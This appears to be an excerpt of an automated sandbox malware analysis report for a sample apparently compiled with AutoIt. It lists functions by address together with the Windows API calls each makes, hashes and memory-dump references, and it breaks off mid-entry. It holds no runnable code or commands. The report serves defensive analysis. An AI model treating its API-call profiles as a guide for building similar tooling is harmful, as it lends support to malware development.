                                                  • Opcode Fuzzy Hash: ea317867c5eff2efa4bdb978e7d77fdc5f4a7f730339e7f33da0f61b96dc7ad4
                                                  • Instruction Fuzzy Hash: DD516F35E00619EFCF11EF64C845AAEB7B4EF48350F108099E959BB391CB71AE81DB91
                                                  Function 00C4EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C4EF06
                                                  • VariantClear.OLEAUT32(00000013), ref: 00C4EF78
                                                  • VariantClear.OLEAUT32(00000000), ref: 00C4EFD3
                                                  • _memmove.LIBCMT ref: 00C4EFFD
                                                  • VariantClear.OLEAUT32(?), ref: 00C4F04A
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C4F078
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 91795e50371d7720363fa8ed40f36d535c8245efc3b48d8d625d3d763bce3bf2
                                                  • Instruction ID: 91235ee4efd0a4b58d54cf20d3049e7b8e4dc0aa43ac2ed91eba9b83d1c2b294
                                                  • Opcode Fuzzy Hash: 91795e50371d7720363fa8ed40f36d535c8245efc3b48d8d625d3d763bce3bf2
                                                  • Instruction Fuzzy Hash: BB513CB5A00209DFDB14CF58C884AAAB7B8FF8C314B15856DE959DB301E735E952CFA0
                                                  Function 00C5220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52258
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C522A3
                                                  • IsMenu.USER32(00000000), ref: 00C522C3
                                                  • CreatePopupMenu.USER32 ref: 00C522F7
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00C52355
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C52386
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: f7ff628b6f9fa92d7db074e4285af0dc3f939c057d59b0ffaad04cd137aa883b
                                                  • Instruction ID: 6f50c7b00332233393e65e8a4a409f3210e3b7adfa3a9dea9e47d80b814f775d
                                                  • Opcode Fuzzy Hash: f7ff628b6f9fa92d7db074e4285af0dc3f939c057d59b0ffaad04cd137aa883b
                                                  • Instruction Fuzzy Hash: E451F338600209DFCF20CF68C888BADBBF8FF46316F144129EC65972A0D3748A88CB55
                                                  Function 00BF1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00BF179A
                                                  • GetWindowRect.USER32(?,?), ref: 00BF17FE
                                                  • ScreenToClient.USER32(?,?), ref: 00BF181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BF182C
                                                  • EndPaint.USER32(?,?), ref: 00BF1876
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: cd48d33d3c10a8e4d94baae332cff6d4d2f5b91391a1bc646aa6856014c5bbee
                                                  • Instruction ID: 635d6627ec6441383fdb951e03bb4f4e27f75a847da1d81f38b86093e0923ccb
                                                  • Opcode Fuzzy Hash: cd48d33d3c10a8e4d94baae332cff6d4d2f5b91391a1bc646aa6856014c5bbee
                                                  • Instruction Fuzzy Hash: E5419D70104204EFD711DF28DCC4BBA7BE8EB59724F044A68FAA8872E1C7319C49DB61
                                                  Function 00C7B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00CB57B0,00000000,015652E0,?,?,00CB57B0,?,00C7B5A8,?,?), ref: 00C7B712
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00C7B736
                                                  • ShowWindow.USER32(00CB57B0,00000000,015652E0,?,?,00CB57B0,?,00C7B5A8,?,?), ref: 00C7B796
                                                  • ShowWindow.USER32(00000000,00000004,?,00C7B5A8,?,?), ref: 00C7B7A8
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00C7B7CC
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C7B7EF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 6dbb7701ca10aa61cb3868ad4f9b176156f1892523216fdaa29f54bdc02d6cbb
                                                  • Instruction ID: a5b337277c75636e62495695447f877140da885bc22990b5226e310abae39be7
                                                  • Opcode Fuzzy Hash: 6dbb7701ca10aa61cb3868ad4f9b176156f1892523216fdaa29f54bdc02d6cbb
                                                  • Instruction Fuzzy Hash: 50417434600244AFDB2ACF24C49AB947BE1FF45314F1881B9F95C8F6A2C731AD96CB61
                                                  Function 00C6709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00C64E41,?,?,00000000,00000001), ref: 00C670AC
                                                    • Part of subcall function 00C639A0: GetWindowRect.USER32(?,?), ref: 00C639B3
                                                  • GetDesktopWindow.USER32 ref: 00C670D6
                                                  • GetWindowRect.USER32(00000000), ref: 00C670DD
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C6710F
                                                    • Part of subcall function 00C55244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  • GetCursorPos.USER32(?), ref: 00C6713B
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C67199
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: f14a2b5dc69b7e5486b6d8e65af848e3a97c14f01023efebc059846714f857f9
                                                  • Instruction ID: 48514fc0ffcec33a1bea64738bd191bef8d2753243ae1569ad9d47f91142a54d
                                                  • Opcode Fuzzy Hash: f14a2b5dc69b7e5486b6d8e65af848e3a97c14f01023efebc059846714f857f9
                                                  • Instruction Fuzzy Hash: A831B272509305ABD720DF14CC89B9FBBA9FF89314F000A1EF59997191D670EA49CB92
                                                  Function 00C48879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C480A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C480C0
                                                    • Part of subcall function 00C480A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C480CA
                                                    • Part of subcall function 00C480A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C480D9
                                                    • Part of subcall function 00C480A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C480E0
                                                    • Part of subcall function 00C480A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C480F6
                                                  • GetLengthSid.ADVAPI32(?,00000000,00C4842F), ref: 00C488CA
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C488D6
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C488DD
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C488F6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C4842F), ref: 00C4890A
                                                  • HeapFree.KERNEL32(00000000), ref: 00C48911
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: 7a22284ca554a80f5bda38346f3d956f5b84d9b739edcc23900a091ef1bee2cb
                                                  • Instruction ID: 0d3d0e41e8ef071e8d68fadee60b97bf03ed18a54befb8cead5a80bcdf2397d5
                                                  • Opcode Fuzzy Hash: 7a22284ca554a80f5bda38346f3d956f5b84d9b739edcc23900a091ef1bee2cb
                                                  • Instruction Fuzzy Hash: 6A11BE31601609FFDB159FA4DC4ABBE7BB8FB45311F50802DE89997210CB329E49DB60
                                                  Function 00C485B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C485E2
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C485E9
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C485F8
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C48603
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C48632
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C48646
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: f62b2d4f233ab27f2fd9ec635a6d0f19193cd0bbdd5da5168e7da36cbd603d82
                                                  • Instruction ID: 809859cc007344bceaa2b46b3f20cf2b433e3dd92cad64e98eb12bfb120d4cba
                                                  • Opcode Fuzzy Hash: f62b2d4f233ab27f2fd9ec635a6d0f19193cd0bbdd5da5168e7da36cbd603d82
                                                  • Instruction Fuzzy Hash: 8A113D7250124DABEF028FA4ED89FEE7BA9FF48344F044069FE05A2161C7719E65DB60
                                                  Function 00C4B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C4B7B5
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C4B7C6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4B7CD
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C4B7D5
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C4B7EC
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00C4B7FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: e3cbea903b230b32f3a85e8f04ec502d5074da5239330a1094269f3b5d2aa4f1
                                                  • Instruction ID: 1ebcf5b7f9ff8dfb97cd396a3f60d6065249c0a716a597e469d1e3d0a50e4ea2
                                                  • Opcode Fuzzy Hash: e3cbea903b230b32f3a85e8f04ec502d5074da5239330a1094269f3b5d2aa4f1
                                                  • Instruction Fuzzy Hash: D6012175A00219BBEB109BA69D85B5EBFA8EB48761F004069FA08E7291D6709D11CFA1
                                                  Function 00C10162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C10193
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C1019B
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C101A6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C101B1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C101B9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C101C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 3732cace6924ac7305c774845520f7378cf7ce93875fc97a2243abcc8300dea3
                                                  • Instruction ID: 4753e365b7942c630b65fbe86e0fd52f6bd1ffdf0c3b353928eed9edc7354f86
                                                  • Opcode Fuzzy Hash: 3732cace6924ac7305c774845520f7378cf7ce93875fc97a2243abcc8300dea3
                                                  • Instruction Fuzzy Hash: 9F0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15C47941C7B5A864CBE5
                                                  Function 00C553E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C553F9
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C5540F
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00C5541E
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5542D
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C55437
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5543E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 4907a5f51af311f76b3ad8f06274a500b44b67b0478205ba63380bba6927efe1
                                                  • Instruction ID: 705adaea7af21498f0878bbe9ede11708551b4bdf3e59e106ccabdbcd251612e
                                                  • Opcode Fuzzy Hash: 4907a5f51af311f76b3ad8f06274a500b44b67b0478205ba63380bba6927efe1
                                                  • Instruction Fuzzy Hash: 42F01D32241558BBE7215BA29C4DFAF7A7CEBC6B12F00016DFA08D106197A11A82C6B5
                                                  Function 00C57230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00C57243
                                                  • EnterCriticalSection.KERNEL32(?,?,00C00EE4,?,?), ref: 00C57254
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00C00EE4,?,?), ref: 00C57261
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C00EE4,?,?), ref: 00C5726E
                                                    • Part of subcall function 00C56C35: CloseHandle.KERNEL32(00000000,?,00C5727B,?,00C00EE4,?,?), ref: 00C56C3F
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C57281
                                                  • LeaveCriticalSection.KERNEL32(?,?,00C00EE4,?,?), ref: 00C57288
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: dd6127c5817fffa1a82a4528d81d6c179f4a81b252a095cb7961a05d3ba01b26
                                                  • Instruction ID: 8291576a4699d5940381aff6a669b3a2bad4d6cd1f25ee2d7d892c2283483d84
                                                  • Opcode Fuzzy Hash: dd6127c5817fffa1a82a4528d81d6c179f4a81b252a095cb7961a05d3ba01b26
                                                  • Instruction Fuzzy Hash: E4F05E3A544612EBD7111B64ED8CBDE7729FF45702F500639F607910A2CF7659C6CB60
                                                  Function 00C48992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C4899D
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C489A9
                                                  • CloseHandle.KERNEL32(?), ref: 00C489B2
                                                  • CloseHandle.KERNEL32(?), ref: 00C489BA
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C489C3
                                                  • HeapFree.KERNEL32(00000000), ref: 00C489CA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: ed4872d06946a089ceba1f47286c7dd659607a09fb93f6a6caed744aa7c5e921
                                                  • Instruction ID: a5c2acbeb5548a3e687619647b9ba1690a8f95792df98f7a16d53d2f778f5894
                                                  • Opcode Fuzzy Hash: ed4872d06946a089ceba1f47286c7dd659607a09fb93f6a6caed744aa7c5e921
                                                  • Instruction Fuzzy Hash: 9FE05276104505FBDB021FF5EC4CB5EBB69FB89762B508639F21D82470CB3294A2DB60
                                                  Function 00C685ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C68613
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C68722
                                                  • VariantClear.OLEAUT32(?), ref: 00C6889A
                                                    • Part of subcall function 00C57562: VariantInit.OLEAUT32(00000000), ref: 00C575A2
                                                    • Part of subcall function 00C57562: VariantCopy.OLEAUT32(00000000,?), ref: 00C575AB
                                                    • Part of subcall function 00C57562: VariantClear.OLEAUT32(00000000), ref: 00C575B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: dadd6923334d0201a3235c58a882c98d65f1679e35dbbc27f5389f32d6b54750
                                                  • Instruction ID: 963e8f0d29811569440882460048b7bf3abe9e4f1b43f2dd6b54e4edba0514ce
                                                  • Opcode Fuzzy Hash: dadd6923334d0201a3235c58a882c98d65f1679e35dbbc27f5389f32d6b54750
                                                  • Instruction Fuzzy Hash: BA918E74608305DFCB20DF24C48496AB7F4EF89754F14896DF99A8B3A1DB30E949CB92
                                                  Function 00C52A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                  • _memset.LIBCMT ref: 00C52B87
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C52BB6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C52C69
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C52C97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
